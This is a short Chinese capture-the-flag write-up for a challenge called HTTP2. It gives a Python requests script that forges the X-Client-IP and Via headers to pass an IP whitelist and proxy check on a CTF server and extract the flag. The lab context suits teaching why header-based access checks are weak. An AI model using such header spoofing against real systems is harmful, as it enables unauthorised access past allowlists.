HTTP2

思路

查看文章详细内容，得到通关要求

• 只接受POST方法访问
• IP白名单：110.191.22.73 | 110.191.22.79 | 110.191.22.113
• 代理服务器信息：主机名为lutalica.time、HTTP版本为1.0、类型为Squid 3.1

因此，需要修改访问时 HTTP 请求头的信息，可以通过 BurpSuite 拦截流量并修改请求头，也可以使用 Python 直接编写 exp：

import requests
import re

target = "http://ctf.seek2.top:32775/post/post.php"
headers = {
    'X-Client-IP': '110.191.22.73',
    'Via': '1.0 lutalica.time (Squid 3.1)'
}
url = target

html = requests.post(url, headers=headers).text
# print(html)
print(re.findall(r'flag.*', html))

其中对检测 IP 的请求头做了限制，需要打印出返回信息调试